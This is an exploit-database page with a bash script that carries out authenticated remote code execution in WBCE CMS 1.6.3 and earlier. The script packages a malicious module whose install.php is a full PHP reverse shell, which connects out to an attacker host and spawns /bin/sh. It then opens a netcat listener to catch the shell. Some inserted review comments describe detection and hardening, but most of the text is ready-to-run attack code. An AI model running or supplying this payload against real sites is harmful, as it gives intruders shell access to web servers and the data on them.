## https://sploitus.com/exploit?id=PACKETSTORM:190302
# Exploit Title: WBCE CMS <= v1.6.3 Authenticated Remote Code Execution (RCE)
    # Date: 3/22/2025
    # Exploit Author: Swammers8
    # Vendor Homepage: https://wbce-cms.org/
    # Software Link: https://github.com/WBCE/WBCE_CMS
    # Version: 1.6.3 and prior
    # Tested on: Ubuntu 24.04.2 LTS
    # YouTube Demonstration: https://youtu.be/Dhg5gRe9Dzs?si=-WQoiWU1yqvYNz1e
    # Github: https://github.com/Swammers8/WBCE-v1.6.3-Authenticated-RCE
    
    #!/bin/bash
    
    # Make a zip file exploit
    # Start netcat listener
    
    # Argument check: exactly two arguments (<lhost> <lport>) are required;
    # otherwise the description and usage text are printed and the script exits
    # with status 1.
    # NOTE(review): as the text below states, the module has to be uploaded and
    # installed through the admin panel by a logged-in administrator. The
    # defensive boundary is therefore the admin account and the module-install
    # feature: limit who holds that privilege, protect those logins, and review
    # module installation events. The header lists 1.6.3 and prior as affected;
    # whether a later release changes this behaviour is not stated on this page,
    # so check the vendor's advisories.
    if [[ $# -ne 2 ]]; then
    	echo "[*] Description:"
    	echo "[*] This is an Authenticated RCE exploit for WBCE CMS version <= 1.6.3"
    	echo "[*] It will create an infected module .zip file and start a netcat listener."
    	echo "[*] Once the zip is created, you will have to login to the admin page"
    	echo "[*] to upload and install the module, which will immediately run the shell"
    	echo "[*] Shell taken from: https://github.com/pentestmonkey/php-reverse-shell/tree/master"
    	echo "[!] Usage:"
    	echo "[*] $0 <lhost> <lport>"
    	exit 1
    fi
    
    # Dependency check: `which nc` printing nothing is taken to mean netcat is
    # not on PATH, and the script stops with status 1.
    if [ -z "$(which nc)" ]; then
    	echo "[!] Netcat is not installed."
    	exit 1 
    fi
    
    # Both arguments are used exactly as given, with no validation; further down
    # the shell expands them into the generated install.php.
    ip=$1
    port=$2
    
    # Start from a clean slate: delete any earlier archive and staging directory
    # of the same name in the current working directory, then recreate the
    # staging directory.
    rm -rf shellModule.zip
    rm -rf shellModule
    mkdir shellModule
    
    echo [*] Crafting Payload
    
    # Write the module manifest (info.php) into the staging directory. The heredoc
    # delimiter is unquoted, so the shell would expand a bare $; every PHP
    # variable is written as \$ so that it reaches the file literally.
    # The manifest declares directory 'modshell', name 'Reverse Shell' and
    # version '1.3.3.7'.
    # NOTE(review): these strings are the author's own choice and are trivially
    # changed, so they are weak indicators. More durable signals are the event
    # itself (a module installed or a new module directory appearing outside a
    # planned change) and new PHP files written by the web server account.
    cat <<EOF > shellModule/info.php
    <?php
    /**
     *
     * @category        modules
     * @package         Reverse Shell
     * @author          Swammers8
     * @link                        https://swammers8.github.io/
     * @license         http://www.gnu.org/licenses/gpl.html
     * @platform        example.com
     * @requirements    PHP 5.6 and higher
     * @version         1.3.3.7
     * @lastmodified    May 22 2025
     *
     *
     */
    
    \$module_directory               = 'modshell';
    \$module_name                    = 'Reverse Shell';
    \$module_function                = 'page';
    \$module_version                 = '1.3.3.7';
    \$module_platform                = '2.10.x';
    
    \$module_author                  = 'Swammers8';
    \$module_license                 = 'GNU General Public License';
    \$module_description     = 'This module is a backdoor';
    
    ?>
    EOF
    # The heredoc that follows writes install.php, which per the usage text runs
    # as soon as the module is installed. It is the pentestmonkey
    # php-reverse-shell with $ip and $port filled in by the shell. What the PHP
    # visibly does: optionally pcntl_fork()/posix_setsid(), open an outbound TCP
    # connection with fsockopen(), start '/bin/sh -i' through proc_open(), and
    # relay bytes between the socket and the process pipes.
    # NOTE(review): detection and hardening points that follow from that:
    #   - a web server / PHP worker process spawning /bin/sh;
    #   - outbound connections from the web server to an unexpected host and port
    #     (egress filtering would stop the callback);
    #   - php.ini disable_functions covering proc_open, fsockopen and pcntl_fork,
    #     where the application can run without them.
    
    cat <<EOF > shellModule/install.php
    <?php
    set_time_limit (0);
    \$VERSION = "1.0";
    \$ip = '$ip';  // CHANGE THIS
    \$port = $port;       // CHANGE THIS
    \$chunk_size = 1400;
    \$write_a = null;
    \$error_a = null;
    \$shell = 'uname -a; w; id; /bin/sh -i';
    \$daemon = 0;
    \$debug = 0;
    
    if (function_exists('pcntl_fork')) {
    	\$pid = pcntl_fork();
    	if (\$pid == -1) {
    		printit("ERROR: Can't fork");
    		exit(1);
    	}
    	
    	if (\$pid) {
    		exit(0);  // Parent exits
    	}
    
    	if (posix_setsid() == -1) {
    		printit("Error: Can't setsid()");
    		exit(1);
    	}
    
    	\$daemon = 1;
    } else {
    	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
    }
    
    chdir("/");
    
    umask(0);
    
    
    \$sock = fsockopen(\$ip, \$port, \$errno, \$errstr, 30);
    if (!\$sock) {
    	printit("\$errstr (\$errno)");
    	exit(1);
    }
    
    \$descriptorspec = array(
       0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
       1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
       2 => array("pipe", "w")   // stderr is a pipe that the child will write to
    );
    
    \$process = proc_open(\$shell, \$descriptorspec, \$pipes);
    
    if (!is_resource(\$process)) {
    	printit("ERROR: Can't spawn shell");
    	exit(1);
    }
    
    stream_set_blocking(\$pipes[0], 0);
    stream_set_blocking(\$pipes[1], 0);
    stream_set_blocking(\$pipes[2], 0);
    stream_set_blocking(\$sock, 0);
    
    printit("Successfully opened reverse shell to \$ip:\$port");
    
    while (1) {
    	if (feof(\$sock)) {
    		printit("ERROR: Shell connection terminated");
    		break;
    	}
    
    	if (feof(\$pipes[1])) {
    		printit("ERROR: Shell process terminated");
    		break;
    	}
    
    	\$read_a = array(\$sock, \$pipes[1], \$pipes[2]);
    	\$num_changed_sockets = stream_select(\$read_a, \$write_a, \$error_a, null);
    
    	if (in_array(\$sock, \$read_a)) {
    		if (\$debug) printit("SOCK READ");
    		\$input = fread(\$sock, \$chunk_size);
    		if (\$debug) printit("SOCK: \$input");
    		fwrite(\$pipes[0], \$input);
    	}
    
    	if (in_array(\$pipes[1], \$read_a)) {
    		if (\$debug) printit("STDOUT READ");
    		\$input = fread(\$pipes[1], \$chunk_size);
    		if (\$debug) printit("STDOUT: \$input");
    		fwrite(\$sock, \$input);
    	}
    
    	if (in_array(\$pipes[2], \$read_a)) {
    		if (\$debug) printit("STDERR READ");
    		\$input = fread(\$pipes[2], \$chunk_size);
    		if (\$debug) printit("STDERR: \$input");
    		fwrite(\$sock, \$input);
    	}
    }
    
    fclose(\$sock);
    fclose(\$pipes[0]);
    fclose(\$pipes[1]);
    fclose(\$pipes[2]);
    proc_close(\$process);
    
    function printit (\$string) {
    	if (!\$daemon) {
    		print "\$string\n";
    	}
    }
    
    ?> 
    EOF
    
    # Package the staging directory as shellModule.zip and delete the staging copy.
    echo [*] Zipping to shellModule.zip
    zip -r shellModule.zip shellModule
    rm -rf shellModule
    echo [*] Please login to the WBCE admin panel to upload and install the module
    echo [*] Starting listener
    
    # Blocks here, listening on TCP $port, until the netcat session ends.
    nc -lvnp $port
    
    echo
    echo
    echo "[*] Done!"
    # Nothing in this script removes the module from the CMS; the message below
    # leaves that as a manual step.
    # NOTE(review): for responders this means the installed module and its
    # files can still be present after the session; review the installed-module
    # list and the modules directory for entries nobody can account for.
    echo "[*] Make sure to uninstall the module named 'Reverse Shell' in the module page"